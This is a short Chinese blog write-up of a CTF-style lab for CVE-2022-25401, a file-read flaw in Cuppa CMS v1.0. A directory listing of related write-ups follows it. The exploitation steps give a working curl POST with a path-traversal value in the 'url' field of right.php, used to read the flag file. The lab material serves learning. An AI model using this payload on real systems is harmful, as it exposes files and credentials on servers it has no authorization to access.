CVE-2022-25401

最新推荐文章于 2025-04-11 16:09:18 发布

liebe1*1

最新推荐文章于 2025-04-11 16:09:18 发布

阅读量499

点赞数 1

分类专栏：春秋云境文章标签：网络安全 web安全

本文链接：https://blog.youkuaiyun.com/longlangci/article/details/131351013

版权

春秋云境专栏收录该内容

17 篇文章

订阅专栏

文章目录

- CVE-2022-25401

CVE-2022-25401

一、漏洞介绍

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

二、渗透步骤

1、打开网站

http://eci-2zebeobcl4wwalpbssu8.cloudeci1.ichunqiu.com/

在这里插入图片描述

2、查看flag值

┌──(kali㉿kali)-[~]
└─$ curl -X POST "http://eci-2zebeobcl4wwalpbssu8.cloudeci1.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"

在这里插入图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

liebe1*1

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

ED01-CMS 代码问题漏洞（CVE-2022-28525）

千寻的博客

11-27

1247

ED01-CMS v20180505 存在任意文件上传漏洞

Cuppa CMS 访问控制错误漏洞(CVE-2022-25401)

千寻的博客

12-09

2504

Cuppa CMS v1.0 的administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

参与评论您还未登录，请先登录后发表或查看评论

cve-2022-25401

最新发布

m0_74125616的博客

04-11

340

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞。3、随便输入账号密码登录，然后抓包。5、点击发送之后成功获取flag。4、构造请求post。

云镜CVE-2022-25401复现

m0_46684679的博客

02-09

862

Cuppa CMS v1.0 任意文件读取漏洞

春秋云镜 CVE-2022-25401

qq_22002773的博客

07-03

158

春秋云镜 CVE-2022-25401

春秋云境：CVE-2022-25401

一只爱吃橙子的羊

12-01

1085

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

春秋云境CVE-2022-25401

2303_76653367的博客

05-20

394

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞。

春秋云境cuppa CMS任意文件读取 CVE-2022-25401

qq_52923396的博客

09-07

312

访问url尝试进行弱口令登录，登录不成功。直接尝试访问right.php。利用curl命令获取flag。

Cuppa CMS任意文件读取漏洞（CVE-2022-25401）

qq_23003811的博客

07-24

311

中文件管理器的复制功能允许将任何文件复制到当前目录，从而授予攻击者对任意文件得读取权限，/templates/default/html/windows/right.php文件存在任意文件读取漏洞。1、访问接口POST接口/templates/default/html/windows/right.php。

春秋云境：CVE-2022-25401（任意文件读取漏洞）

m0_65712192的博客

04-22

2397

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

Cuppa CMS v1.0 任意文件读取（CVE-2022-25401）

qq_45392044的博客

02-27

393

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞。

春秋CVE-2022-25401 Cuppa CMS v1.0 任意文件读

xxx177的博客

11-14

1723

春秋CVE-2022-25401 Cuppa CMS v1.0 任意文件读

【春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP

果粒程

11-30

1453

【春秋云境】CVE-2022-25488靶场WP和CVE-2022-25401靶场WP

春秋云镜CVE-2022-25411

风依旧的博客

05-16

534

春秋云镜CVE-2022-25411，通过搜索引擎得到上传文件路径/admin/files，将cookie修改为正确口令得到的cookie，发现能成功进入上传页面。如果出现404，就是数据包中缺失index.php路径，自行添加即可。思路是对的，但是admin/admin888依然返回302，将口令带入重放器中尝试。通过搜索引擎，得到/admin/options为登录页面，尝试进入登录页面。尝试上传图片，上传成功。

Cuppa CMS-任意文件读取CVE-2022-25401

Biu_Biu_Bi的博客

11-15

200

Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞

春秋云境系列靶场记录（合集）-不再更新

一只爱吃橙子的羊

11-29

8723

春秋云境系列靶场记录合集，不更新了哈……

CVE-2022-24785

03-14

首先，用户提供了三个引用链接，但看起来都是关于其他CVE的，比如CVE-2022-21907、CVE-2022-0492和CVE-2022-0543。不过用户现在需要的是CVE-2022-24785的信息，所以可能需要先确认这些引用是否相关，或者是否存在...